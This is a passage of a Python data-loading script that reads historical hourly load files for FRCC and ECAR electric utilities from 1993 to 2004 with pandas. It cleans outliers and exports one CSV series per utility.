        1996 : pd.read_fwf('%s/frcc/1996/SECI96' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/SECI97' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/SECI99' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/SECI00' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        2002 : pd.read_fwf('%s/frcc/2002/SECI02' % (fulldir), header=None).iloc[:, 3:].values.ravel(),
        2004 : pd.read_fwf('%s/frcc/2004/SECI04' % (fulldir), header=None).iloc[:, 3:].values.ravel()
    }
}
# Post-process and export the FRCC series.
# Manual outlier removal: zero out implausible spikes so the zero->NaN
# conversion below marks them missing (thresholds chosen per utility/year).
frcc[6455][1995][frcc[6455][1995] > 10000] = 0
frcc[9617][2002][frcc[9617][2002] > 10000] = 0
frcc[10376][1995][frcc[10376][1995] > 300] = 0
if not os.path.exists('./frcc'):
    os.mkdir('frcc')
# Sorted keys give a deterministic processing/file-write order (plain dict
# iteration order is arbitrary on the Python 2 interpreters this targets).
for k in sorted(frcc.keys()):
    print(k)  # parenthesized form is valid in both Python 2 and Python 3
    # Stitch each utility's per-year arrays into one hourly-stamped series:
    # every year's array is indexed from Jan 1 of that year for exactly as
    # many hours as the array holds, then all years are concatenated and
    # time-sorted into a single 'load' column.
    s = pd.DataFrame(pd.concat([pd.Series(frcc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(frcc[k][i]))) for i in frcc[k].keys()]).sort_index(), columns=['load'])
    # Zeros in the raw files denote missing (or manually removed) hours;
    # convert them to NaN so downstream consumers treat them as gaps.
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./frcc/%s.csv' % k)
###### ECAR
# AEP: 829
# APS: 538
# AMPO: 40577
# BREC: 1692
# BPI: 7004
# CEI: 3755
# CGE: 3542
# CP: 4254
# DPL: 4922
# DECO: 5109
# DLCO: 5487
# EKPC: 5580
# HEC: 9267
# IPL: 9273
# KUC: 10171
# LGE: 11249
# NIPS: 13756
# OE: 13998
# OVEC: 14015
# PSI: 15470
# SIGE: 17633
# TE: 18997
# WVPA: 40211
# CINRGY: 3260 -> Now part of 3542
# FE: 32208
# MCCP: (respondent ID unknown -- no data loaded for this utility below)
ecar = {
829 : {
1993 : pd.read_fwf('%s/ecar/1993/AEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/AEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/AEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/AEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/AEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/AEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/AEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/AEP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/AEP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AEP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AEP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AEP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
538 : {
1993 : pd.read_fwf('%s/ecar/1993/APS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/APS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/APS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40577 : {
2001 : pd.read_fwf('%s/ecar/2001/AMPO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AMPO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AMPO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AMPO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
1692 : {
1993 : pd.read_fwf('%s/ecar/1993/BREC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/BREC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/BREC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/BREC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/BREC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/BREC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BREC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BREC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BREC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BREC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/BREC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BREC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
7004 : {
1994 : pd.read_fwf('%s/ecar/1994/BPI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BPI99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BPI00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BPI01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BPI02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/BPI03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BPI04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3755 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CEI96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3542 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CIN96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/CIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/CIN98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/CIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/CIN00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/CIN01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/CIN02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/CIN03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/CIN04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4254 : {
1993 : pd.read_fwf('%s/ecar/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4922 : {
1993 : pd.read_fwf('%s/ecar/1993/DPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5109 : {
1993 : pd.read_fwf('%s/ecar/1993/DECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DECO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DECO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DECO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DECO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DECO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DECO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DECO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DECO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5487 : {
1993 : pd.read_fwf('%s/ecar/1993/DLCO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DLCO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DLCO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DLCO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DLCO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DLCO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DLCO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DLCO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DLCO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DLCO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DLCO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DLCO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5580 : {
1993 : pd.read_fwf('%s/ecar/1993/EKPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/EKPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/EKPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/EKPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/EKPC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/EKPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/EKPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/EKPC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/EKPC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/EKPC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/EKPC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/EKPC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9267 : {
1993 : pd.read_fwf('%s/ecar/1993/HEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/HEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/HEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/HEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/HEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/HEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/HEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/HEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/HEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/HEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/HEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
